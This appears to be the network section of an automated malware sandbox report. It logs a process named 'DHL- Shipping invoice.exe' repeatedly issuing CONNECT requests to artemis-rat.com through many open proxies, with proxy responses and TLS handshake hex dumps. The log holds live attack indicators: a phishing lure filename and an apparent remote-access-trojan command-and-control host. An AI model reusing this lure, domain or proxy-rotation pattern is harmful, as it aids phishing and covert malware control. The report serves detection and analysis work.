                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1562192.168.2.45309572.195.101.9941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.928031921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1563192.168.2.454697172.67.181.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.928040028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.015898943 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1564192.168.2.45377372.210.252.134461646484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.928265095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1565192.168.2.45464437.187.77.58379206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.928689957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1566192.168.2.449963107.180.88.173445686484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.928931952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062572002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074333906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062752008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.077928066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.249814034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:42.265458107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1567192.168.2.45472543.135.159.784436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.931567907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1568192.168.2.452931207.188.130.3880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.932337999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941544056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953425884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.953260899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1569192.168.2.45472843.135.159.784436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.936105967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1570192.168.2.44990741.111.243.134806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.936234951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.268089056 CET98INHTTP/1.0 200 Connection Established
                            Proxy-agent: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
                            Mar 12, 2024 08:37:07.349842072 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 22 65 7c f0 d5 58 bd 9b 44 4a 6d 5a 70 65 25 d7 2f d3 f2 40 4b 9f 6f 32 a0 94 4f 69 b5 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e"e|XDJmZpe%/@Ko2Oi*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:07.553308010 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 f0 06 23 28 7a 29 cb 47 a2 e5 55 4b 1d 6e 03 fe a9 62 19 b1 df c2 9f 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                            Data Ascii: C?e#(z)GUKnbDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                            Mar 12, 2024 08:37:07.553327084 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                            Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                            Mar 12, 2024 08:37:07.553339958 CET536INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                            Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                            Mar 12, 2024 08:37:07.553388119 CET536INData Raw: 30 39 33 30 30 30 30 30 34 32 5a 30 46 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 13 30 11 06 03 55 04 03 13 0a 47 54 53 20 43 41 20 31 50
                            Data Ascii: 0930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50"0*H0$-D[>eO-XZ(juORUJ[H6%#_`e\:\m}0N<etxs1to
                            Mar 12, 2024 08:37:07.553402901 CET536INData Raw: 2b 06 01 05 05 07 30 01 86 1a 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f 67 74 73 72 31 30 30 06 08 2b 06 01 05 05 07 30 02 86 24 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 72 65 70 6f 2f 63 65 72 74 73 2f 67 74 73 72 31
                            Data Ascii: +0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.der04U-0+0)'%#http://crl.pki.goog/gtsr1/gtsr1.crl0MU F0D08+y0*0(+https://pki.goog/repository/0g0*Hlc'
                            Mar 12, 2024 08:37:07.553416014 CET536INData Raw: 08 0f 09 3e 23 5a c7 e3 42 2d 7a 36 e4 3d 98 96 60 39 98 ea d1 db 63 2a eb 78 09 b1 4e 21 b3 8e b7 ce 3e 92 f1 95 5c a4 39 d0 c0 2b c8 53 15 f5 d2 2f 82 cd 06 74 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb
                            Data Ascii: >#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!
                            Mar 12, 2024 08:37:07.553427935 CET536INData Raw: f6 b1 f9 ce 84 1d b1 f9 c5 97 de ef b9 f2 a3 e9 bc 12 89 5e a7 aa 52 ab f8 23 27 cb a4 b1 9c 63 db d7 99 7e f0 0a 5e eb 68 a6 f4 c6 5a 47 0d 4d 10 33 e3 4e b1 13 a3 c8 18 6c 4b ec fc 09 90 df 9d 64 29 25 23 07 a1 b4 d2 3d 2e 60 e0 cf d2 09 87 bb
                            Data Ascii: ^R#'c~^hZGM3NlKd)%#=.`HMzY1.ml~&E=y(&<hS:+z.uVdOh=@\5lPL 3R2)%*Hrd8fcx{\wv
                            Mar 12, 2024 08:37:07.553458929 CET536INData Raw: 66 2c ef f0 89 13 71 3e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70
                            Data Ascii: f,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+
                            Mar 12, 2024 08:37:07.553565025 CET306INData Raw: 28 03 00 1d 20 b6 60 f1 06 6b e2 85 1a fd eb 9c db 51 7e f7 f9 64 08 11 cc bb 1a 81 fc 30 dd 8a a6 36 40 bf 52 08 04 01 00 45 96 19 47 aa f4 23 51 09 a5 51 2d 33 54 9e e9 b2 0f 09 62 32 e4 ed f4 0c f5 56 1c 8f 04 10 76 95 35 c0 c1 02 57 06 e9 d8
                            Data Ascii: ( `kQ~d06@REG#QQ-3Tb2Vv5W^MJ-,:A:l?|FID7qf7YO=n$aLN,ixM'f'2y`!Jdu=:0kiS8+RL{z5.pFn


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1571192.168.2.454638212.127.93.18580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.937151909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1572192.168.2.454025160.153.245.187428796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.939050913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359451056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953491926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953474045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750231981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562740088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250148058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.750044107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:23.562504053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1573192.168.2.45473143.135.159.784436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.939367056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1574192.168.2.44994337.187.77.58197676484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.939882040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062525988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074337959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062753916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1575192.168.2.454627103.23.101.3041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.946726084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1576192.168.2.452894161.97.163.52320926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.949852943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471843004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.141050100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453500986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.951004028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.546931028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.082547903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141233921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.140424013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1577192.168.2.454675163.172.147.9163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.967112064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.562382936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.062881947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.062710047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.062962055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.824357986 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 